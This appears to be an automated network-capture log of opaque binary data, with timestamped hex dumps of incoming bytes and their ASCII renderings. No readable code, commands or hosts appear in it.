                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1401INData Raw: 80 d5 50 91 16 a4 61 c8 96 92 1c 32 ab 66 84 42 cc 40 ae e8 8c 5d 10 43 df 8d 96 f0 71 4d 55 10 3b 3f 6a 15 05 b7 8e 13 38 2f 72 04 8f c4 81 90 4e 9b 2b ea 35 a0 ec 66 ba 10 0a af 65 0c ca de d6 c4 1e 81 6a d3 b5 d7 be ac 13 4e 34 0e fd a0 42 93 56 e5 f8 75 6b 6c 0d 4b 39 c9 3a 39 11 46 04 55 14 ea d9 bf fd 39 d5 72 70 ef ed 7a c4 bf 9f 34 91 b4 f0 28 9b 25 31 9a 07 63 5a de 84 35 72 56 38 0a c7 cb 85 27 be 29 aa 80 b3 86 7b 2d e8 41 56 05 96 bf f6 8c bb 9d 40 01 e6 95 17 d0 32 ce dc 94 4b ec 4a cf 65 52 46 6d 60 72 07 d5 1a 37 0d ec bb 02 27 39 30 7e 3b c2 4c f6 1f e8 1b f1 2e dc 8d ff 0e 1e 27 ff 1e 87 09 95 59 1a 3e 5c 02 7d 34 a5 f6 fa 34 52 bb 93 e2 69 bd 76 1f f9 49 e8 d8 dc fe ba ee 6a 6f e6 7e cc 40 4e e4 b4 4a bd 54 75 d5 bf 78 d9 c5 ce 09 2f 06
                                                                                                                                                                                                    Data Ascii: Pa2fB@]CqMU;?j8/rN+5fejN4BVuklK9:9FU9rpz4(%1cZ5rV8'){-AV@2KJeRFm`r7'90~;L.'Y>\}44RivIjo~@NJTux/
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1417INData Raw: ab 65 ae b4 cf e4 7c 51 ea 7d 65 55 3a 2e 19 f0 25 5b 15 da 41 ee e1 78 7b 47 b3 28 f1 68 69 9a c2 f8 e4 ff 1b 6b 45 ee d1 44 af 47 93 89 9d 60 cd 02 a2 cb cc e0 83 bb e0 4c eb cc 10 d4 25 69 c2 b2 08 ae a1 ea 07 76 ae 02 b6 3a ed 21 53 ff d2 51 78 da 14 e2 5d ca 8f c5 d8 62 03 6a 23 38 90 8f d6 e7 df e6 1b 37 74 b2 b8 26 02 76 13 d9 30 c5 ed ec c0 7a 67 8c eb b1 5b 36 e0 05 fb 0b bc fc 65 3d 96 6d 67 cc a7 34 80 36 64 f3 4b e9 a0 c6 41 23 6d c2 2e 1d 19 9b ea 45 99 d6 34 de bb 5f 23 2e c5 44 71 13 38 c1 05 5b d5 49 1d f1 96 c5 c3 31 8c 40 c5 18 41 52 39 7b 6a 7c 79 57 26 06 2d 44 59 29 05 44 b5 0d a9 1c 00 91 99 9a 5d a5 9f bd 90 29 38 b9 db 71 c5 0f 3d 99 22 85 87 a6 fc 53 9c 02 f8 7e f3 17 4c 5c 31 13 8d 92 8e b0 f2 a2 8e 4c 15 cb f5 9e 6b 83 96 47 07
                                                                                                                                                                                                    Data Ascii: e|Q}eU:.%[Ax{G(hikEDG`L%iv:!SQx]bj#87t&v0zg[6e=mg46dKA#m.E4_#.Dq8[I1@AR9{j|yW&-DY)D])8q="S~L\1LkG
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1433INData Raw: 8f bd ed 92 40 db f3 e2 aa 04 b0 66 b7 02 22 e0 4d 6e d5 da cd 60 47 18 58 bf a9 5b c1 62 dc da 1a 48 49 19 1a ca 79 25 b0 95 48 6a 1f 57 4c 63 9b af db d2 e5 6a a9 85 1c 7b 72 4f b1 14 c6 18 90 ea c3 be 1d 2d 06 41 74 a6 e8 5d a3 a9 45 d2 e1 76 eb 84 0d 9d c8 3e 16 b0 a8 83 fb fa d5 f5 f1 fe c2 d1 11 c4 bd 62 0c 8c 9a 61 93 b1 13 49 c9 e6 07 6c 6a 70 ce 2d a7 72 9b 68 13 8d d0 ad da f9 0d 01 e8 aa 1f c1 e8 44 47 55 14 7d f7 40 0d c7 ae 88 02 95 db b9 43 a5 e4 f7 68 30 0e 68 03 3c fd 12 d1 40 e3 90 a5 85 01 39 66 4f 0e f6 b2 e5 ba f4 9a b7 44 5e 50 3a af fa 56 17 99 d3 7b 95 d3 ea 98 fc ef bc 5a e7 1c ef da a7 af ce 5d 2b ee 93 7f e2 08 df 52 06 ea 07 10 af ef ef 4f 31 a2 89 b5 03 23 d4 bc d8 e1 03 56 10 6b 2f 3d 49 7b a2 d9 c8 93 89 07 37 95 ff 53 b7 22
                                                                                                                                                                                                    Data Ascii: @f"Mn`GX[bHIy%HjWLcj{rO-At]Ev>baIljp-rhDGU}@Ch0h<@9fOD^P:V{Z]+RO1#Vk/=I{7S"
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1449INData Raw: 38 48 0f 68 0c 74 eb 37 b7 8a 0c b6 c2 36 52 47 58 90 e3 1c 76 d5 09 60 70 1c 89 d0 2f 37 28 68 44 86 27 7a 98 c9 89 59 82 96 d9 96 b6 ef 8e 9b 01 f8 29 62 f1 43 77 06 09 02 dd 74 2b 5b aa 56 de af 91 ef 38 bb 42 36 b9 c7 c6 38 cf 62 2f 8a 64 7d d7 e4 e4 93 0e eb 7f 45 e4 df 3d 57 4b 69 c2 c5 6f d0 67 4b c3 2c e6 c6 db 4e a3 56 b4 46 aa c2 0d ed 08 ec c6 10 0a dd c9 b0 c0 d3 57 7b 78 d3 ff 12 40 75 39 32 e1 7d 3c d7 e7 30 c5 db da ef a6 5c 76 b4 f3 58 a7 f5 9f 1e 13 99 98 10 c2 07 09 26 34 91 3b 0c 0e 4c 1f 40 7d 6f 32 67 05 ec 92 08 8a 68 09 93 71 62 59 a6 08 c3 2a 81 11 0d 05 5f 09 bd 3d 40 de 17 97 ae 1a a5 4c 3b 8a ba b7 ba dd 94 8b b8 fd 65 b3 1d f3 b8 0b fa 94 72 48 23 65 3c 9a b6 eb d9 cc dc 3f 87 95 2c da a1 b8 98 32 fd 7a b8 a8 de 9f a0 a2 9c a3
                                                                                                                                                                                                    Data Ascii: 8Hht76RGXv`p/7(hD'zY)bCwt+[V8B68b/d}E=WKiogK,NVFW{x@u92}<0\vX&4;L@}o2ghqbY*_=@L;erH#e<?,2z
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1465INData Raw: 28 45 8c 0d 60 e9 09 14 d4 8c d4 a1 76 27 98 b3 15 12 b3 81 d0 bf ce 49 6b 8c d5 16 3a d9 b0 c2 42 1f c2 8e 98 52 69 ee e1 1d f1 37 24 c3 32 c9 04 b4 02 da f7 2f 80 6b b7 e8 4f d3 25 97 bf 40 42 9e f9 8b b6 4a de 1f 0f 5a 35 38 09 b7 d2 8a aa d7 7e 27 ae c2 b4 11 2a 26 9d 84 68 7e 36 e7 fe cc fd 8a 53 96 bf 1c 8d b2 99 ab 38 5f 5e 79 61 8d 37 89 bd 09 90 e2 2c b5 8d ac 2d 17 8c 92 1b 75 99 eb f2 67 8f b4 ed 7d e4 b6 25 00 d3 95 d7 91 bc 6d e2 d6 f2 95 1a 3c 3c 73 34 a8 d9 a1 5e d7 2c 84 5d 9c 5f 45 45 a6 b8 88 f5 04 03 4f 9b 71 77 83 93 74 67 93 ee 36 09 f7 2e 07 62 ba 99 ce 78 94 67 d4 bc e7 2e 25 7a 45 cc 6f d0 4d 2d 38 63 23 45 d6 69 ec ad 63 23 22 06 14 42 04 09 61 22 fd 2d ae 5d a6 a5 2f 28 2c 1a 18 30 b0 08 bc 2d f3 f7 9f 37 44 8e 63 0e 8e 84 f6 8c
                                                                                                                                                                                                    Data Ascii: (E`v'Ik:BRi7$2/kO%@BJZ58~'*&h~6S8_^ya7,-ug}%m<<s4^,]_EEOqwtg6.bxg.%zEoM-8c#Eic#"Ba"-]/(,0-7Dc
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1481INData Raw: 11 5a e7 24 a5 48 8c 7e 9b 32 e4 6c 96 83 d5 2c 5b 6b e6 c9 84 fb 75 4d 76 58 d4 d4 96 93 0e 39 37 68 0f 0a c4 cf 5d 64 b2 07 30 1a 64 7a 23 a0 77 27 0b cf 72 b4 bc 06 1e 2b a2 e7 6d 4d 65 c8 94 c4 40 af 05 98 9b 1c a2 10 f9 e3 4f b2 d3 de da b8 ca 62 45 c3 75 e1 57 ea 4c d1 2e 73 2e a7 c0 b8 17 78 ea 46 27 59 30 6a 62 77 7e 22 dd 39 07 82 ed 14 a0 c5 73 e2 d8 95 ad 96 4b 2c 75 da a7 ed 39 e3 f9 3b 4c 95 26 c7 b6 07 f0 38 01 ad 89 18 bf f1 48 d3 1c 19 48 a5 3d b4 c6 65 be d2 ff 80 06 af bf 31 5e d2 d6 e4 71 bb a7 03 36 1d 4c 45 51 58 d2 63 ec aa 52 e8 47 82 e2 6e bd b7 f3 c4 4f 6c c5 7d 90 89 d0 eb 1b 92 7d 7b f7 94 64 ec f4 01 a2 8d fe a2 57 8e ec 63 c4 42 68 43 db c0 88 51 66 16 61 5c 53 9a ac 98 a9 04 68 f1 b7 bd 48 58 de 03 8b 32 95 4b 57 fe 8d 66 d4
                                                                                                                                                                                                    Data Ascii: Z$H~2l,[kuMvX97h]d0dz#w'r+mMe@ObEuWL.s.xF'Y0jbw~"9sK,u9;L&8HH=e1^q6LEQXcRGnOl}}{dWcBhCQfa\ShHX2KWf
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1497INData Raw: a4 96 92 ee 62 cc cd c6 a2 ab 02 5d f8 9f 21 19 70 07 16 03 2c 91 85 ee b1 15 e3 a1 76 1f 09 3f dc 48 f7 5f 1b 78 1a c6 8c 45 03 c9 00 a5 75 d0 a4 29 eb 92 8f bc 89 0f 00 92 03 db 35 aa a2 fa a0 70 f0 af 5b ee 57 a2 22 ab 2b 78 04 c2 ff ac a7 0e e5 32 08 d1 07 da 52 0c 90 fd 7b 2e 08 4b 86 8e be f8 b8 64 45 df 12 f8 60 3b 56 3d 8a 85 bc 8e e8 9c 52 01 3c ef 10 e7 fb d0 68 45 64 3c 6c 65 c5 aa 57 77 d6 6d 50 0e 0b e1 10 99 e9 d8 76 1b 8c e0 b3 ae e8 b1 5a 2e ec e4 86 34 5b 76 34 75 7d ac 62 d7 f7 f0 5d b8 eb a3 da 32 7d 69 73 1d a7 38 e0 d1 da 6f 4d 02 b9 60 24 eb c6 de ad 6c 53 7d e3 cb 91 4b f2 0c 41 38 b1 78 5c fe 95 6b b0 f4 66 2d d4 9a 12 4a 6d 77 35 96 2d 0a 7b 86 bc 35 12 79 29 5a 01 c4 cd 52 5f a2 0a 58 ed 0f 15 16 84 61 72 5a 9c 5a 27 11 4a 71 fd
                                                                                                                                                                                                    Data Ascii: b]!p,v?H_xEu)5p[W"+x2R{.KdE`;V=R<hEd<leWwmPvZ.4[v4u}b]2}is8oM`$lS}KA8x\kf-Jmw5-{5y)ZR_XarZZ'Jq
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1513INData Raw: 27 be 58 a2 79 60 5f 31 79 b6 4f 50 f5 6a 54 77 2c 76 62 34 8e 51 0d fb 54 42 48 bc 12 6a 24 5b d5 d6 e8 89 65 aa 3a be 71 01 6b 28 f8 aa cc 2d 0f d1 ab 55 13 0a 43 7e e9 7b 22 6b 8c cb 80 12 47 b4 da 7f 06 a8 31 0a e5 5e d3 dc d3 d1 cf f9 5b 84 50 9b 7f 2c 3b 90 5f 82 1a 9c e6 25 95 a5 a9 20 58 26 46 db 5f e7 bb 9c eb 14 64 dc 0b 94 1f 44 db 10 86 3f 6f 91 2f a7 bf 30 74 cc a5 fb 48 a6 fe 64 d4 51 e9 94 67 a2 0c 58 a8 98 64 be 7b 48 ee b0 02 03 1f e0 24 42 d5 58 e7 06 ec 66 a0 8e 09 23 a4 11 6b c6 08 3d 47 54 ee 02 1a 23 bf 4c c3 a8 08 9b 37 fe 60 79 0f 0a 6d b5 d4 eb d2 e7 65 08 9e 0b 00 c4 88 e7 7d 64 15 b0 f9 a3 e5 42 49 93 eb f0 8b 1a b4 91 75 05 bc 78 2b ea 60 31 9b a8 e7 f4 ac 9c 8d 3d 51 5b 2d f9 40 0e ca b9 c6 e1 17 e3 6c 39 4e 1f 9f 3c 3a 0c 7c
                                                                                                                                                                                                    Data Ascii: 'Xy`_1yOPjTw,vb4QTBHj$[e:qk(-UC~{"kG1^[P,;_% X&F_dD?o/0tHdQgXd{H$BXf#k=GT#L7`yme}dBIux+`1=Q[-@l9N<:|
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1529INData Raw: c1 20 06 a0 0a 72 71 cb 36 83 e2 2c 2c 17 b3 f0 2c 4a d6 88 5a da af 28 de 0c 5d 66 52 d6 05 fe ba 1a 48 c2 cd 6a ef eb bf 74 34 fe a5 9a 5e a8 c3 49 43 a6 04 77 9e e9 0d 61 51 fb fc 95 72 9a ff a0 1c d1 6b 21 b4 b0 fb 09 91 e8 c6 82 7c 82 5d b7 47 2b e8 3c 01 5f 73 15 f8 24 66 d2 1e 73 46 31 38 e1 d8 d2 4b db 8a 9e 35 54 a2 78 5a e3 dc 20 e4 3e 84 c4 c5 68 f9 08 6a 23 72 13 d2 27 b0 e1 b3 26 9f e4 7a be 0c 6d 86 a3 9e f7 c3 48 75 9e 1f ef dd 85 12 57 aa 8c 1a b9 7c 66 d3 6c 2e 9a d2 91 4a 82 9f 45 ca 6d 08 80 c0 8f b5 3f e1 79 e0 d9 03 ee 3e f1 62 47 45 89 53 81 20 73 d5 94 3f 05 4f 6a dc 32 9a b6 05 66 2b ea a6 88 b4 2e 38 31 71 46 84 10 72 50 5c 35 e0 30 30 09 89 8a 40 22 20 de 58 e3 1a 7f 1f 1c 54 84 30 cf 26 f8 90 d9 1f 87 40 ef a1 a6 f5 1d 12 e6 07
                                                                                                                                                                                                    Data Ascii: rq6,,,JZ(]fRHjt4^ICwaQrk!|]G+<_s$fsF18K5TxZ >hj#r'&zmHuW|fl.JEm?y>bGES s?Oj2f+.81qFrP\500@" XT0&@
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1545INData Raw: 1d 8f b3 e6 f1 07 ed 93 2f 18 93 2e c0 ed 4c 3e e3 e1 6d af c0 c3 ff 48 58 55 52 e4 70 f9 bf 58 28 56 56 04 95 6a fb 57 96 73 bc 32 d7 a3 58 f4 b3 9c bb 8d 5e 09 71 17 12 ce aa 2c ba fd 3e a9 87 8a 52 4d 54 96 ed 2a 90 ab ec ff 79 1d 21 f9 7d 3b 34 28 a8 35 b1 d9 a4 da 3c f9 6e 4a 1e 6c fb 34 bc 74 0d 9f 57 1c b6 73 74 1f 3a c8 5e e6 b3 aa 3d 48 c4 12 59 98 6e 87 66 26 39 ea f2 8b 8a d9 72 fd 30 c1 ff 8b ed fd c5 10 4b ed f0 58 98 c9 5d 4c 64 29 04 5d 82 f3 ff 80 d0 f4 b6 36 98 b0 c1 df 6e fe 48 44 e2 06 c4 d0 ba c5 6f 8a ca fd cc 11 e3 f3 63 1f 12 a2 a5 d1 ec 64 e9 bb 59 df a4 41 f3 38 63 f1 5e 56 9d 9f c3 32 5f a8 74 5e b0 e7 16 02 02 02 a8 a6 71 bb 8a 2f 57 2e dc a3 e5 06 d3 a6 2e 57 31 6b d8 77 45 91 3e 55 96 96 a8 86 e7 63 40 2f ec 3a 6f f1 7a e2 8a
                                                                                                                                                                                                    Data Ascii: /.L>mHXURpX(VVjWs2X^q,>RMT*y!};4(5<nJl4tWst:^=HYnf&9r0KX]Ld)]6nHDocdYA8c^V2_t^q/W..W1kwE>Uc@/:oz
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1561INData Raw: 9c 86 e2 6a b3 ba e6 3d 72 3d 63 62 ff 6c f5 57 86 59 a4 d0 6c 9b ad e9 52 3a 0b 0d 59 cc bd d6 45 27 2b 4b dd 5f ce 5a 45 ea 97 03 c7 5b 89 e3 de ca 62 db 96 b3 8c 3a f6 08 36 a4 11 5b 84 46 11 99 9d ee 4a 2e e6 d9 79 36 96 c6 8b b3 da 2a 02 66 6f 9e 6e a4 f7 f4 00 d7 5c ed e3 04 94 52 46 02 e9 b0 6f 2e 49 92 8e 6b b2 b9 42 9a 2d b8 96 65 5a 51 5f 0d 8c 94 05 d6 27 77 30 43 4d f3 51 f4 c5 e9 39 11 90 5e 72 cd e5 f5 49 95 9a c5 18 d7 93 ab a0 ce cf d0 71 d5 12 82 5a b3 52 de 43 62 bf 78 8e cb 74 b1 3c 08 f4 34 2a 6c 94 45 d9 6d d8 95 51 cc 0b fc e9 78 62 01 4c 9d cf 1c 7c e3 dd 74 cc 6b 76 37 4d 4c 1c 3b 90 8f 84 e1 d2 ab 8f 81 fa 19 52 8f 2f 1a d8 36 cb af fa cd 96 20 99 3f fc f1 fa 1c e8 a1 51 b5 4e bc 3f 36 9b 91 4d 1a b0 3d 96 b2 9a 26 fa a5 19 8d a7
                                                                                                                                                                                                    Data Ascii: j=r=cblWYlR:YE'+K_ZE[b:6[FJ.y6*fon\RFo.IkB-eZQ_'w0CMQ9^rIqZRCbxt<4*lEmQxbL|tkv7ML;R/6 ?QN?6M=&
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1577INData Raw: 0a f9 15 ac f0 8c fb 16 a0 0a fc 4c 5b 8e 12 53 e0 d7 48 b6 68 85 15 67 de 7b 52 79 18 e9 cd ca 4e dc 85 a7 2c 6c 01 af 15 0a 43 8c a6 38 23 b0 53 80 1f 8e 2a 55 40 de cf 37 ba 60 53 b6 26 2b c3 ef 9e 86 86 d8 70 4b 70 72 ac ec 30 99 08 36 c9 fc 5d a2 20 76 40 da d9 b2 9d 61 f6 65 39 4a 22 d4 f0 f0 67 89 24 db 2a 39 da 21 e4 fb 5e 60 74 d1 06 6c fd 7a 25 f9 48 7c 90 50 64 6b e5 0a 70 0d 87 79 73 68 43 b8 0e c2 2f 1e 66 d4 7b db 00 1b 50 79 33 6f 35 74 d1 c5 d7 24 86 03 11 04 8d aa b7 dc fa 4e cb 71 a6 b5 d1 f0 34 57 b5 18 73 ad e4 38 96 8b 11 93 5e d0 f2 d5 6a 2c d3 98 ce 18 86 e3 ac 8f f1 eb af 20 6b 04 aa be 37 7b 03 de b9 13 44 ad b0 68 01 6d 8d bf 68 d5 6a 06 2e e8 77 06 52 75 17 88 cd 53 4b 18 8b 99 b1 43 27 63 a7 f8 56 6c 85 75 be f4 e4 0e ca 55 c1
                                                                                                                                                                                                    Data Ascii: L[SHhg{RyN,lC8#S*U@7`S&+pKpr06] v@ae9J"g$*9!^`tlz%H|PdkpyshC/f{Py3o5t$Nq4Ws8^j, k7{Dhmhj.wRuSKC'cVluU
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1593INData Raw: 25 cf 22 01 35 f7 6f 8e fe 92 4f f7 6e b4 fe 62 da 89 f3 b0 79 0d 27 d4 49 a6 e3 45 6b 20 e9 1e fc 7e d3 ff a0 a3 5a c7 d7 b5 2d 32 d9 b0 7f 37 ae b4 51 6a 19 1a aa 30 59 cb e8 fd 9a 9e 00 8a f1 63 08 84 a9 f1 53 d1 a7 77 4f 80 7e ae 8a 13 87 c1 a0 a2 a1 a1 62 40 87 d9 31 00 1b ba b7 3a 16 bd 0a 0a 16 5d 97 16 3e 8f 07 bf ed 3d bf 4f 4a 04 a4 84 bf 42 b2 87 d9 91 19 99 4e 4f d3 e5 a5 e5 4e 36 b1 50 04 82 0e 08 99 35 12 ca 8b 3e 16 f3 82 7e 62 8e 08 61 48 df 61 99 c7 15 06 0f 82 8e 82 d0 92 9f e3 3d 99 4f b3 ff 64 8a ab 62 cb 97 5d a3 97 38 03 8b a7 95 23 3f c2 26 3c 57 36 3a 9c 0d e0 9c 87 52 ed 80 19 b9 e9 1b 63 ed 41 90 f0 db 75 67 bc 28 d2 f1 f0 a5 7c aa bc b2 88 88 59 75 11 8d 21 65 2f 24 d0 f7 d6 01 d8 da e9 2b 5a bd 02 47 48 e4 98 ca 35 58 f8 2a 27
                                                                                                                                                                                                    Data Ascii: %"5oOnby'IEk ~Z-27Qj0YcSwO~b@1:]>=OJBNON6P5>~baHa=Odb]8#?&<W6:RcAug(|Yu!e/$+ZGH5X*'
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1609INData Raw: 69 f5 ce 0d 0a e3 b7 5c cf b5 c7 f6 3c 06 a0 7c ec 69 1a 0a 9f e0 7c a3 c7 71 9f 59 dd 33 35 f8 6f 8b 12 1a c3 3a dd 15 dd f8 2d 3f 79 6a 22 ad 13 6d 00 9e 3b e1 62 e5 85 49 24 35 3f 40 f6 a8 f7 1c 93 ca 71 48 8c 9c dd 53 11 a3 04 81 be 5a 37 2d 89 c8 50 7d 5a 2f 65 8d f9 a7 cb a0 7b 47 1b 94 b1 59 39 da 11 f4 c1 cc e6 60 d2 e4 a1 4b 5f 58 69 a8 01 9b 95 56 8a 05 bc 97 83 16 28 e5 21 62 27 38 ce 9b 7e 7b c2 9a 1d 16 71 6b 76 b8 66 38 87 2a 3c 00 72 66 e9 1d 56 83 21 19 af 0f a2 d0 c9 0a 62 dd e6 51 a3 ca 40 aa 8b 67 b9 a2 3e 3c cc 3e 2e fe 39 11 13 99 76 91 90 4b b8 d6 13 36 a7 0b d0 a7 48 c9 9b 8a c9 6c 50 e1 20 2f 1e 0a 3f 3a 86 e3 a8 2e 86 a4 69 b1 7e cb 31 a6 c0 f5 bb 63 0e 11 36 4e 02 31 6d 97 21 37 01 12 81 ff 2c 1e d7 78 97 39 74 c4 45 d8 d8 b9 ac
                                                                                                                                                                                                    Data Ascii: i\<|i|qY35o:-?yj"m;bI$5?@qHSZ7-P}Z/e{GY9`K_XiV(!b'8~{qkvf8*<rfV!bQ@g><>.9vK6HlP /?:.i~1c6N1m!7,x9tE
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1625INData Raw: 8d 3b 5a 3f 43 aa 9e 23 d4 c8 a3 0d 44 2b f9 75 d4 55 a5 15 e1 13 4d c6 3f 8e f5 5c f7 83 7b a3 eb ea 12 b8 d8 d5 12 a9 43 68 d6 bd 85 a9 7d 7e e6 21 c3 32 1b f8 d9 30 fe 4e c4 e2 f1 2f a1 e1 99 b0 50 00 1c 7f 17 a6 16 1e d2 b7 17 e3 aa ec 13 64 c4 22 f7 30 89 b8 7b 36 d6 b0 2a 2f e8 1c a4 25 e8 43 2e 2f ba 18 c9 1b 84 7e 96 4a 41 61 6e 19 17 b0 e7 cd 28 ab 4e 74 af 7a ae 55 37 03 76 c1 90 6b 8a 3f 77 d0 a1 2c d4 18 af 8c 3b 3d c7 b5 f4 bd 54 bb 01 9a 89 e3 1d 80 17 5c 73 9d 4a 43 bc 34 6f 3a b5 ca 5d 14 f5 40 97 d0 e7 9f f7 94 0a 82 35 fa 8b df 47 82 82 94 54 cf 4e a1 44 e6 2d 0b b7 9f d3 98 d2 1c 64 9e 2c e6 7d eb fd e9 ca eb a3 04 a4 61 36 8d 50 65 12 b4 13 0f 8c 88 dc f5 87 82 c3 ac db 47 33 fe f6 0b 59 01 df 94 8c 33 c7 50 65 4c bb 43 62 0e 2f c4 ef
                                                                                                                                                                                                    Data Ascii: ;Z?C#D+uUM?\{Ch}~!20N/Pd"0{6*/%C./~JAan(NtzU7vk?w,;=T\sJC4o:]@5GTND-d,}a6PeG3Y3PeLCb/
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1641INData Raw: 01 f5 c4 2f a9 0b 7d 62 13 c7 9b ae 22 f1 c4 aa fe c7 39 cb 3d 81 f2 54 60 a5 5a 85 cd 6c 20 7c 51 0c 08 95 02 1d fd 63 f5 e1 1f bf e7 d9 56 42 49 8b 64 d8 5b c2 52 43 dc 58 95 e1 12 7d 88 9c d1 37 9f 8b 66 bf c7 5c 65 5d 8e 78 47 bf 31 d9 55 46 b8 13 80 24 71 c8 95 e9 4b 5c 39 7b 18 3b 32 82 cd 90 a7 71 bc 22 de 86 1d 0d 78 74 ba 4e 8b 1b a2 36 82 58 d2 60 0c 86 7b 4e f5 73 d4 a9 99 28 9d 42 3a 35 a0 45 b5 0e 50 ac 46 8e 37 70 94 af f9 0d ba 70 5d 39 08 a3 a0 2d 71 ff 2c a7 23 04 56 80 ee 7d 90 c1 ab b6 1c c9 6a 64 b1 14 91 d4 fe 17 f9 e3 b2 c5 10 50 bc 2e 47 40 21 f7 19 3d ed fe d8 59 ae f0 ab e8 ab c9 ec ae e1 29 f8 4a 9a 18 87 b7 9b f1 d5 36 65 4b 4e e3 41 f6 5d 79 51 bc 6e 9e a1 ce f8 d8 0b 77 4b a3 bc 3e 18 71 be 34 63 5a eb db 74 43 6b 78 21 dc 97
                                                                                                                                                                                                    Data Ascii: /}b"9=T`Zl |QcVBId[RCX}7f\e]xG1UF$qK\9{;2q"xtN6X`{Ns(B:5EPF7pp]9-q,#V}jdP.G@!=Y)J6eKNA]yQnwK>q4cZtCkx!
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1657INData Raw: 48 0b b6 ed c0 b9 a3 df fa 38 a3 fc ec 4e a7 8d 8d b4 ac b2 b7 be 60 9d a6 64 0a f3 0c 47 dd f5 d5 d2 ea 52 ad 16 d9 c4 65 e2 77 25 a2 65 e7 e5 46 bf 6c 94 e2 4b c8 04 ed cd a4 36 73 81 7f d7 ec b4 5d 04 2d 81 50 a0 b9 af d9 30 66 76 49 37 2e 5e 00 91 57 67 29 48 bb d8 c6 c1 c2 6c 0e 82 6a 92 8b 74 5e 2d a5 c6 56 b9 f9 1e b5 d0 f1 12 97 3c 2b 2a 06 c5 61 12 50 f9 e6 24 3c d2 ec 52 f3 bb 45 66 5b 1e e1 ca 7f a5 df b3 9e 53 5e 8a d3 25 3b ba 0a a0 10 ee ef ad c3 e7 43 6f 90 ca a8 23 4c b1 9f be 21 68 b3 84 32 17 8c 74 6e 82 c9 c9 75 ee 98 28 03 a4 71 01 01 6b bd 0c 65 8f 82 0c 3a 32 b3 33 96 39 1f 07 42 28 ed 00 19 cc 52 44 47 fa e7 ca 68 ab 0c 0e 2c 68 55 d5 c9 b8 75 c0 c3 ef 58 7e 3c c4 17 eb 8e 01 e4 03 97 fb 10 aa cc 7d a0 60 8e de 34 e2 e0 2f be 0f fb
                                                                                                                                                                                                    Data Ascii: H8N`dGRew%eFlK6s]-P0fvI7.^Wg)Hljt^-V<+*aP$<REf[S^%;Co#L!h2tnu(qke:239B(RDGh,hUuX~<}`4/
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1673INData Raw: 2f 63 0e c0 2d 6d 23 60 1f 42 12 a0 70 22 3e 6a 6e e5 d5 e9 40 97 d8 47 07 05 80 69 d4 94 46 1a 34 88 9e 24 86 ee e8 7a 06 06 37 8e 34 da 15 98 57 f8 54 dc 8a a1 da b9 c7 f2 29 b1 9d 1f 1b 0e dd 5a 69 f2 d1 0c 95 f0 4c 41 39 ce f0 a9 ba ed f9 ed db 24 c1 d0 b0 21 2b 8c 80 bb a0 21 b6 19 e7 4d 2a 2f 84 be f9 f3 54 b4 f6 b7 11 82 26 40 c8 70 fc 78 c2 27 96 dd 2f 84 39 9d 27 ad 45 f9 d9 44 95 c6 1e eb 39 69 ec 1a 4c 54 7c 2f b9 3c e8 99 2c f5 b1 35 78 f9 2f e4 df 1d 0f ab 1e 22 95 9a 9d 43 f4 4d d3 5b b9 f6 f8 f9 6b 8a f9 04 39 45 4a f1 5a 3b c3 96 16 d9 fd bd a1 e8 8b 98 c0 ad 60 be 54 94 e7 f7 f4 da cc 4c a5 f3 40 da 95 32 2b 83 9f 24 68 cf 0d 53 62 6e 55 a6 6b bd b8 38 23 a3 6e 82 c8 f7 2d 3c e7 8c ac ae a8 e5 46 bb 23 a3 ab 9c b3 74 37 51 00 45 f6 95 d1
                                                                                                                                                                                                    Data Ascii: /c-m#`Bp">jn@GiF4$z74WT)ZiLA9$!+!M*/T&@px'/9'ED9iLT|/<,5x/"CM[k9EJZ;`TL@2+$hSbnUk8#n-<F#t7QE
                                                                                                                                                                                                    2022-01-14 03:59:48 UTC1689INData Raw: 19 cd a6 cd 24 4f 0e 25 23 bd 09 f7 fa e7 20 64 93 03 1c cf dd a5 6c 19 54 33 8a 18 56 90 90 68 40 87 c9 84 87 cc ba 8f aa 77 b3 31 1c d4 7b 1e af 5b 5b e6 9a 3c 32 8d fe 61 e0 a9 a9 00 48 32 ec 39 90 5b 9e 2a 8a 93 9d 83 42 52 de 50 f3 2b 09 1f ef 1a f6 c5 d5 35 f6 dc 7a 62 ab 01 22 95 66 cf de fb c1 a2 d9 b8 f1 2e c0 be 30 82 6a 1a 98 11 fa dd 9c d1 70 2f 06 0a 1d 40 1e 88 3f 07 7d e5 e9 97 5e aa 93 de 43 06 8d 47 73 19 36 84 1c ad ba b9 99 20 95 33 73 af 66 8f ee 53 84 a8 77 43 05 e2 4b 15 11 ec c1 fb b0 25 ce 2e 3f 01 aa c0 d4 42 cd 9b 1c cd 42 39 8b bb 50 5f a5 c7 9a 2e b3 44 db 6f b5 d6 f8 df 47 75 71 5a 43 d7 06 fe d6 39 b4 22 78 69 82 37 60 08 bf 32 b3 10 ce 8f fe 18 1a 6b 72 6a 27 93 a4 9c fc 63 2d bf 0b 63 7a a6 f5 f3 2c 69 14 3f 5c d9 cd 6d 9e
                                                                                                                                                                                                    Data Ascii: $O%# dlT3Vh@w1{[[<2aH29[*BRP+5zb"f.0jp/@?}^CGs6 3sfSwCK%.?BB9P_.DoGuqZC9"xi7`2krj'c-cz,i?\m
